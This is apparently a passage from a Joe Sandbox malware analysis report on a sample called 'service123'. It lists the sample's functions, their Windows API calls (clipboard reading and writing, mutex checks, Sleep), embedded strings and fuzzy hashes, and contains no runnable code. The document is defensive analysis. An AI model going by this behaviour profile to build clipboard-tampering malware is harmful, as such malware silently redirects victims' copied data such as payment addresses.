Associated: 00000005.00000002.3307715899.0000000000010000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307770444.000000000001A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307796313.000000000001E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307816608.0000000000021000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000_service123.jbxd

Similarity

API ID: malloc$ExceptionFilterSleepUnhandled__p__acmdln_amsg_exit_inittermmemcpystrlen
String ID:
API String ID: 2230096795-0
Opcode ID: 09cc4bfdba8c281116d6114c2e19f45fc00732f4277ed823d4f1cb2279beb41b
Instruction ID: 697b14d3a339d5794f9b8e47c45cbd99cfb29f86c961bd8d8f65fa7a5c13c198
Opcode Fuzzy Hash: 09cc4bfdba8c281116d6114c2e19f45fc00732f4277ed823d4f1cb2279beb41b
Instruction Fuzzy Hash: D1414E70A043158FEB56DF64E8843DEB7F0BB48344F10852EDA8597351D778A986CF92

Function 00011160 Relevance: 9.1, APIs: 6, Instructions: 131
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32 ref: 000111B7
SetUnhandledExceptionFilter.KERNEL32 ref: 00011238
__p__acmdln.MSVCRT ref: 00011261
malloc.MSVCRT ref: 000112EB
strlen.MSVCRT ref: 00011323
malloc.MSVCRT ref: 0001132E
memcpy.MSVCRT ref: 00011344
GetStartupInfoA.KERNEL32 ref: 00011433

Memory Dump Source

Source File: 00000005.00000002.3307743651.0000000000011000.00000020.00000001.01000000.00000005.sdmp, Offset: 00010000, based on PE: true

Associated: 00000005.00000002.3307715899.0000000000010000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307770444.000000000001A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307796313.000000000001E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307816608.0000000000021000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000_service123.jbxd

Similarity

API ID: malloc$ExceptionFilterInfoSleepStartupUnhandled__p__acmdlnmemcpystrlen
String ID:
API String ID: 1672962128-0
Opcode ID: e1701df054e87f41af2beeea1042a3c5fdcd7499ca03859e7ef0ab37a8b37917
Instruction ID: e30f08bdf00437a60e67d75e2564f474d272d8d5f5a207b96d015211277fd7ca
Opcode Fuzzy Hash: e1701df054e87f41af2beeea1042a3c5fdcd7499ca03859e7ef0ab37a8b37917
Instruction Fuzzy Hash: 49515D71A043148FEB56DF64E8847DEBBF0FB48344F10852DEA449B351D778A986CB81

Function 6C359B70 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 32
sleepsynchronizationclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenMutexA.KERNEL32 ref: 6C359B99
CreateMutexA.KERNELBASE ref: 6C359BE3
Sleep.KERNELBASE ref: 6C359BFF
GetClipboardSequenceNumber.USER32 ref: 6C359C08

Strings

fwFEVxyGBFjyQWNlspqq, xrefs: 6C359B82, 6C359BCC

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: Mutex$ClipboardCreateNumberOpenSequenceSleep
String ID: fwFEVxyGBFjyQWNlspqq
API String ID: 3689039344-261248258
Opcode ID: f366d7e46f5c3b7edadd94d7b510a7639e19bc635293f7385f84ba60bb63117c
Instruction ID: c91994e54535bdf780755a295135ff81c60803abc8b4683d38517e425485b1ef
Opcode Fuzzy Hash: f366d7e46f5c3b7edadd94d7b510a7639e19bc635293f7385f84ba60bb63117c
Instruction Fuzzy Hash: 550112B15083068FDB00FF65C549B6BBFF4AB45704F008818E8C883604EBB5A09ACFA2

Function 00011296 Relevance: 5.1, APIs: 4, Instructions: 80
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.MSVCRT ref: 000112EB
strlen.MSVCRT ref: 00011323
malloc.MSVCRT ref: 0001132E
memcpy.MSVCRT ref: 00011344

Memory Dump Source

Source File: 00000005.00000002.3307743651.0000000000011000.00000020.00000001.01000000.00000005.sdmp, Offset: 00010000, based on PE: true

Associated: 00000005.00000002.3307715899.0000000000010000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307770444.000000000001A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307796313.000000000001E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307816608.0000000000021000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000_service123.jbxd

Similarity

API ID: malloc$memcpystrlen
String ID:
API String ID: 3553820921-0
Opcode ID: 8d1ff47c71e412a8183fc0ad9eff459f215220903f27b8dddac73c8f0eb64706
Instruction ID: 1a663ef3903410040a09282b22baf274ee62e65edfa9758994552a5067a1975d
Opcode Fuzzy Hash: 8d1ff47c71e412a8183fc0ad9eff459f215220903f27b8dddac73c8f0eb64706
Instruction Fuzzy Hash: D53116759043158FEB56DF64D8843D9BBF1FB48300F05852EDA8897312D739A986CF81

Function 000113BB Relevance: 5.1, APIs: 4, Instructions: 66
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.MSVCRT ref: 000112EB
strlen.MSVCRT ref: 00011323
malloc.MSVCRT ref: 0001132E
memcpy.MSVCRT ref: 00011344

Memory Dump Source

Source File: 00000005.00000002.3307743651.0000000000011000.00000020.00000001.01000000.00000005.sdmp, Offset: 00010000, based on PE: true

Associated: 00000005.00000002.3307715899.0000000000010000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307770444.000000000001A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307796313.000000000001E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307816608.0000000000021000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000_service123.jbxd

Similarity

API ID: malloc$memcpystrlen
String ID:
API String ID: 3553820921-0
Opcode ID: ee9d9b5125b0b37dbdbe32b0e159cd637e79956133ab365b30f68004e151c50d
Instruction ID: 1c0db2ca72b0777eda9aaaacc8729a051ae14a7981e1a7c580be2fc6ff88b6ed
Opcode Fuzzy Hash: ee9d9b5125b0b37dbdbe32b0e159cd637e79956133ab365b30f68004e151c50d
Instruction Fuzzy Hash: 6E21F3B5D053158FDB16DF64D8846DDB7F1BB88300F11892ED988A7311D738AA46CF81

Function 6C35B3F0 Relevance: 1.4, APIs: 1, Instructions: 144
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 700c51ff78b9e957cd838e2d8f3993a39b04362a9278d8c7634ccec98b57378d
Instruction ID: fa356c800328e143e077fbf07a6b9878c5097b6f9bcac409a457d6f1c5db4baf
Opcode Fuzzy Hash: 700c51ff78b9e957cd838e2d8f3993a39b04362a9278d8c7634ccec98b57378d
Instruction Fuzzy Hash: F0516EB5A093128FC701DF1AD181D6AFBF0FB8930CB944959D4988BB14E330E814CFA2

Function 6C35B560 Relevance: 1.3, APIs: 1, Instructions: 95
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90962063fab3b06464e956747fcac60201f7ae0bf875fcfb3d0a497b882a7737
Instruction ID: 79993d8c69e14af62aaffaa02cee2b2c19b5de4473de3e10e1da26468028ddbd
Opcode Fuzzy Hash: 90962063fab3b06464e956747fcac60201f7ae0bf875fcfb3d0a497b882a7737
Instruction Fuzzy Hash: BE31CFB17052108FDB05EF2AD581E65BBB5BB4630CB884A68C9808FF49E734D409CF62

Non-executed Functions

Function 6C34CD00 Relevance: 33.4, APIs: 22, Instructions: 445stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C34CD7D

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 847ae23c03460528fb4038fc0facb01e7306157d5f1541caa92616429941fb6c
Instruction ID: cd90406cfe8c75085925c0fa42cecc81ee79cfbb340f44e0c94a3e1c38733140
Opcode Fuzzy Hash: 847ae23c03460528fb4038fc0facb01e7306157d5f1541caa92616429941fb6c
Instruction Fuzzy Hash: D802E1B15087518FD700CF29C044795FBE2AF86318F19C6AED8E85BB92D376A549CF82

Function 6C350FC0 Relevance: 22.6, APIs: 8, Strings: 4, Instructions: 1647stringCOMMON

Download Yara Rule

APIs

localeconv.MSVCRT ref: 6C350FCA
strlen.MSVCRT ref: 6C350FD4

Strings

5, xrefs: 6C3514D2
, xrefs: 6C35240F
inity, xrefs: 6C351E21
!, xrefs: 6C352C08

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: localeconvstrlen
String ID: $!$5$inity
API String ID: 186660782-1328200385
Opcode ID: c4cc8052ad90a7734d374c8dda4ec8a43e818ec47a0cb09eef52adb7eebd266c
Instruction ID: 38d2f8aa262d4f2234fdf9c3466da52938d66cafacd6d5c5ef3f693b0c70cfc5
Opcode Fuzzy Hash: c4cc8052ad90a7734d374c8dda4ec8a43e818ec47a0cb09eef52adb7eebd266c
Instruction Fuzzy Hash: 8CF23575A083818FD320CF69C184B9ABBF0BF89348F91891DE8D997750D776E8548F92

Function 6C3C84D0 Relevance: 17.7, Strings: 14, Instructions: 166COMMON

Download Yara Rule

Strings

Genu, xrefs: 6C3C85DF
random_device::random_device(const std::string&): device not available, xrefs: 6C3C8598
rdrand, xrefs: 6C3C85A8
rdseed, xrefs: 6C3C8518
Genu, xrefs: 6C3C8557
random_device::random_device(const std::string&): unsupported token, xrefs: 6C3C86D2
Genu, xrefs: 6C3C866E
default, xrefs: 6C3C84EF
Auth, xrefs: 6C3C8676
rand_s, xrefs: 6C3C86B7
Auth, xrefs: 6C3C85E7
rdrnd, xrefs: 6C3C8618
Auth, xrefs: 6C3C854F
hardware, xrefs: 6C3C86A0

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: memcmpstrlen
String ID: Auth$Auth$Auth$Genu$Genu$Genu$default$hardware$rand_s$random_device::random_device(const std::string&): device not available$random_device::random_device(const std::string&): unsupported token$rdrand$rdrnd$rdseed
API String ID: 3108337309-1359127009
Opcode ID: 0a7fca88a3aa40cac998921b3b6a9813098492f73d939fcd1c07a2522fe53d75
Instruction ID: e2a08e8ab9974a265a17ca5c0f6bb338d555b0295a76462d13ec018da34d9e68
Opcode Fuzzy Hash: 0a7fca88a3aa40cac998921b3b6a9813098492f73d939fcd1c07a2522fe53d75
Instruction Fuzzy Hash: B84146F23193014BE300AA39D49276EB6A6BB4031CF60493ED8829BF51D73ADA55CF53

Function 6C34EE50 Relevance: 12.5, APIs: 8, Instructions: 494COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 6C34F18B
malloc.MSVCRT ref: 6C34F1A8

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: f297550c5f8627407f563f0bbf9c3c47454cf519b7353763ad07b9b50eca62b6
Instruction ID: 3cb523f073ba6af115708420292d4165669c041e0e8ef1c068e0fd712b1bb453
Opcode Fuzzy Hash: f297550c5f8627407f563f0bbf9c3c47454cf519b7353763ad07b9b50eca62b6
Instruction Fuzzy Hash: A4125C756087068FC310CF19C48065AF7E2BF88358F59CA2DE8A997B51D731E809CF92

Function 6C36E6E0 Relevance: 12.2, APIs: 6, Strings: 2, Instructions: 219stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C36E70A
strlen.MSVCRT ref: 6C36E77A

Strings

basic_string: construction from null is not valid, xrefs: 6C36E742, 6C36E7B2, 6C36E822
basic_string: construction from null is not valid, xrefs: 6C36E86F, 6C36E8C0, 6C36E910

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: strlen
String ID: basic_string: construction from null is not valid$basic_string: construction from null is not valid
API String ID: 39653677-1250104765
Opcode ID: e224b6538339669d395490ecccdbbcf8271636a8d68f6da8a162257f2f1a4cb2
Instruction ID: 7a0eb5229c1e0ecc9d6c24231b346a70b8aa0662018ce890e6b1fd4db2e869a1
Opcode Fuzzy Hash: e224b6538339669d395490ecccdbbcf8271636a8d68f6da8a162257f2f1a4cb2
Instruction Fuzzy Hash: E96180F1A157148FCB00EF2CD88589ABBE4BF45214F46496DE8C48B715E236E899CFD2

Function 6C359D11 Relevance: 12.0, APIs: 8, Instructions: 46clipboardmemorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C3E39D0: strlen.MSVCRT ref: 6C3E39DE

OpenClipboard.USER32 ref: 6C359D31
GlobalAlloc.KERNEL32 ref: 6C359D55
GlobalLock.KERNEL32 ref: 6C359D72
strcpy.MSVCRT ref: 6C359D82
GlobalUnlock.KERNEL32 ref: 6C359D8A
EmptyClipboard.USER32 ref: 6C359D93
SetClipboardData.USER32 ref: 6C359DA4
CloseClipboard.USER32 ref: 6C359DAD

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: Clipboard$Global$AllocCloseDataEmptyLockOpenUnlockstrcpystrlen
String ID:
API String ID: 3344633682-0
Opcode ID: 2074c397c39d0b9f5295d65b2b5d93cdfcd612e583da51e618a0943fa4a94fff
Instruction ID: 94df807e4911c40d732a695d7eaafe614a272309f6525395ccc836aaa4af1a35
Opcode Fuzzy Hash: 2074c397c39d0b9f5295d65b2b5d93cdfcd612e583da51e618a0943fa4a94fff
Instruction Fuzzy Hash: BE11B3B19083008BDB00BFB9C5896AEBBF0AB15709F41482DE98687648EB75D459CF53

Function 6C360860 Relevance: 10.7, APIs: 5, Strings: 2, Instructions: 212stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C360886
memcmp.MSVCRT ref: 6C3608A9
memcmp.MSVCRT ref: 6C36091F
memcmp.MSVCRT ref: 6C360991

Part of subcall function 6C40ADB0: strlen.MSVCRT ref: 6C40ADBE

memcmp.MSVCRT ref: 6C360A25

Strings

basic_string::compare, xrefs: 6C3608C8, 6C36093C, 6C3609AF, 6C360A44, 6C360A60
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6C3608D0, 6C360944, 6C3609B7, 6C360A4C, 6C360A68

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: memcmp$strlen
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::compare
API String ID: 3738950036-1697194757
Opcode ID: 8406e6dcd6f19be8921b3dd4b6c9c6c6432b617251962231f7cfe877dd10a678
Instruction ID: ac2aec556e0e5cd9bece8ea8e793b03c029b537f7a1389f405c328d8462e6768
Opcode Fuzzy Hash: 8406e6dcd6f19be8921b3dd4b6c9c6c6432b617251962231f7cfe877dd10a678
Instruction Fuzzy Hash: 05615A7561A3009FD304DF29C98185AFBE5BF88784F54892DE8C887B24E231D845DF96

Function 6C3570C0 Relevance: 9.6, APIs: 6, Instructions: 649COMMON

Download Yara Rule

APIs

localeconv.MSVCRT ref: 6C3570C7
memset.MSVCRT ref: 6C357217

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: localeconvmemset
String ID:
API String ID: 2367598729-0
Opcode ID: 8004c76a8a24ff3f4e87891a091c414680fcf3c97d2f3ddcaab8cb3dbe86abd8
Instruction ID: 3a0a87bde92a65f32782aca3a40fbb0a9dc46c77e766d1c15f6c6b3df2ec55c6
Opcode Fuzzy Hash: 8004c76a8a24ff3f4e87891a091c414680fcf3c97d2f3ddcaab8cb3dbe86abd8
Instruction Fuzzy Hash: ED42E5716283158FD700CF29C480B5ABBE2BF86308F95C91DE8948BB41D776D969CF92

Function 6C355880 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 1506COMMON

Download Yara Rule

Strings

, xrefs: 6C356D95
NaN, xrefs: 6C355B5F
, xrefs: 6C357074
Infinity, xrefs: 6C355BE0

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID:
String ID: $ $Infinity$NaN
API String ID: 0-3274152445
Opcode ID: 811f2e4b77883461277372acf57868eefef783dc08496841b9b0f2b64d35636d
Instruction ID: 17b749a2e00519cc792465ef028ad224937dba182eef7e36ca4751a61dd128b5
Opcode Fuzzy Hash: 811f2e4b77883461277372acf57868eefef783dc08496841b9b0f2b64d35636d
Instruction Fuzzy Hash: 45E221B1A093418FD310DF29C180B4ABBF0BF89758F94891EE8D597751E776E8648F82

Function 6C359E27 Relevance: 6.0, APIs: 4, Instructions: 38clipboardCOMMON

Download Yara Rule

APIs

GetClipboardData.USER32 ref: 6C359E37
GlobalLock.KERNEL32 ref: 6C359E49
GlobalUnlock.KERNEL32 ref: 6C359E6A
CloseClipboard.USER32 ref: 6C359E73
CloseClipboard.USER32 ref: 6C359E98

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308356846.000000006C41F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308410739.000000006C468000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308436620.000000006C469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308465670.000000006C46C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c340000_service123.jbxd

Similarity

API ID: Clipboard$CloseGlobal$DataLockUnlock
String ID:
API String ID: 3186146249-0
Opcode ID: 5b266f245cd8eecadd1ab44d4b7f30f682f37cf5d33386b661b16e5e07737c91
Instruction ID: caabdcea7e3d7707ee3703ec0e82d1ba8df1e1e83e95f011257dacac90003728
Opcode Fuzzy Hash: 5b266f245cd8eecadd1ab44d4b7f30f682f37cf5d33386b661b16e5e07737c91
Instruction Fuzzy Hash: EDF06DB27082018FEB00BF7995481AEBBF0AB49304F410A3DD88293654DB75D4598F93

Function 000151B0 Relevance: 6.0, APIs: 1, Strings: 2, Instructions: 1506COMMON

Download Yara Rule

Strings

, xrefs: 000166C5
, xrefs: 000169A4

Memory Dump Source

Source File: 00000005.00000002.3307743651.0000000000011000.00000020.00000001.01000000.00000005.sdmp, Offset: 00010000, based on PE: true

Associated: 00000005.00000002.3307715899.0000000000010000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307770444.000000000001A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307796313.000000000001E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3307816608.0000000000021000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000_service123.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-227171996
Opcode ID: f6dfecb1e769eae3edac479a12294bec89b9c9f21090cdb2c28f6949b5649869
Instruction ID: 6fcc86bf04c939c4d0941e6b663cf43d0888c4578d2310d3d26a612d315ed149
Opcode Fuzzy Hash: f6dfecb1e769eae3edac479a12294bec89b9c9f21090cdb2c28f6949b5649869
Instruction Fuzzy Hash: FEE223B1A08741CFD760DF29C98079ABBE1BFC8744F14891DE8999B351E776D884CB82

Function 6C3544F0 Relevance: 5.4, Strings: 4, Instructions: 351COMMON

Download Yara Rule

Strings

gfff, xrefs: 6C3545FC
gfff, xrefs: 6C354613
@, xrefs: 6C3546A9
., xrefs: 6C3547E4

Memory Dump Source

Source File: 00000005.00000002.3308134137.000000006C341000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000005.00000002.3308106246.000000006C340000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3308327802.000000006C41D000.00000004.00000001.01000000.00000006.sdmpDownload File
